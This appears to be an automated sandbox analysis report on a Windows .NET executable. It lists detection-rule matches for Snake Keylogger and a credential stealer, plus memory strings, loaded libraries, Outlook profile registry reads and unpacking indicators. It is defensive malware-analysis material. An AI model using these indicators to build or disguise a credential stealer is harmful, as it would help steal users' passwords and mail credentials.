            Source: rp8s2rxD5lpuQAG.exe, 00000000.00000000.2043244059.0000000000A12000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelaoA.exeB vs rp8s2rxD5lpuQAG.exe
            Source: rp8s2rxD5lpuQAG.exe, 00000000.00000002.2078403632.000000001418F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefbXfjPLUOxpHounQOLpg.exeX vs rp8s2rxD5lpuQAG.exe
            Source: rp8s2rxD5lpuQAG.exe, 00000000.00000002.2077703493.0000000003F41000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameReactionDiffusion.dll0 vs rp8s2rxD5lpuQAG.exe
            Source: rp8s2rxD5lpuQAG.exe, 00000000.00000002.2077072837.0000000001580000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameAxiom.dll@ vs rp8s2rxD5lpuQAG.exe
            Source: rp8s2rxD5lpuQAG.exe, 00000000.00000002.2078403632.00000000142F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs rp8s2rxD5lpuQAG.exe
            Source: rp8s2rxD5lpuQAG.exe, 00000000.00000002.2080724592.000000001CCD0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs rp8s2rxD5lpuQAG.exe
            Source: rp8s2rxD5lpuQAG.exe, 00000000.00000002.2077703493.0000000004042000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefbXfjPLUOxpHounQOLpg.exeX vs rp8s2rxD5lpuQAG.exe
            Source: rp8s2rxD5lpuQAG.exe, 00000000.00000002.2078403632.0000000013F51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAxiom.dll@ vs rp8s2rxD5lpuQAG.exe
            Source: rp8s2rxD5lpuQAG.exe, 00000000.00000002.2077599751.0000000003B10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameReactionDiffusion.dll0 vs rp8s2rxD5lpuQAG.exe
            Source: rp8s2rxD5lpuQAG.exe, 00000000.00000002.2080607376.000000001CBD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefbXfjPLUOxpHounQOLpg.exeX vs rp8s2rxD5lpuQAG.exe
            Source: rp8s2rxD5lpuQAG.exe, 00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefbXfjPLUOxpHounQOLpg.exeX vs rp8s2rxD5lpuQAG.exe
            Source: rp8s2rxD5lpuQAG.exeBinary or memory string: OriginalFilenamelaoA.exeB vs rp8s2rxD5lpuQAG.exe
            Source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 3.2.rp8s2rxD5lpuQAG.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 3.2.rp8s2rxD5lpuQAG.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 3.2.rp8s2rxD5lpuQAG.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 3.2.rp8s2rxD5lpuQAG.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000000.00000002.2078403632.00000000142F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000000.00000002.2078403632.00000000142F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000000.00000002.2078403632.000000001418F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000000.00000002.2078403632.000000001418F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000000.00000002.2080607376.000000001CBD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000000.00000002.2080607376.000000001CBD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: rp8s2rxD5lpuQAG.exe PID: 3688, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: rp8s2rxD5lpuQAG.exe PID: 3688, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: rp8s2rxD5lpuQAG.exe PID: 4304, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: rp8s2rxD5lpuQAG.exe PID: 4304, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: rp8s2rxD5lpuQAG.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@4/3
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\rp8s2rxD5lpuQAG.exe.logJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeMutant created: NULL
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeMutant created: \Sessions\1\BaseNamedObjects\XTEInUtACcxhEmxZDnsuX
            Source: rp8s2rxD5lpuQAG.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: rp8s2rxD5lpuQAG.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003D34000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003D64000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003D26000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003D16000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4500739891.0000000013AD2000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003D70000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: rp8s2rxD5lpuQAG.exeReversingLabs: Detection: 55%
            Source: unknownProcess created: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe "C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe"
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess created: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess created: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: rp8s2rxD5lpuQAG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: rp8s2rxD5lpuQAG.exeStatic PE information: Image base 0x140000000 > 0x60000000
            Source: rp8s2rxD5lpuQAG.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: rp8s2rxD5lpuQAG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: laoA.pdb source: rp8s2rxD5lpuQAG.exe
            Source: Binary string: laoA.pdbSHA256Bi source: rp8s2rxD5lpuQAG.exe

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: rp8s2rxD5lpuQAG.exe, Form1.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: rp8s2rxD5lpuQAG.exeStatic PE information: 0xB3565870 [Tue May 5 20:20:00 2065 UTC]
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeCode function: 0_2_00007FF848F4A989 push E9FFFFFFh; iretd 0_2_00007FF848F4A98F
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeCode function: 0_2_00007FF848F400BD pushad ; iretd 0_2_00007FF848F400C1
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeCode function: 0_2_00007FF848F4E8D8 push E9605589h; ret 0_2_00007FF848F4E8DE
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeCode function: 3_2_00007FF848F300BD pushad ; iretd 3_2_00007FF848F300C1
            Source: rp8s2rxD5lpuQAG.exeStatic PE information: section name: .text entropy: 7.66181548748652
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
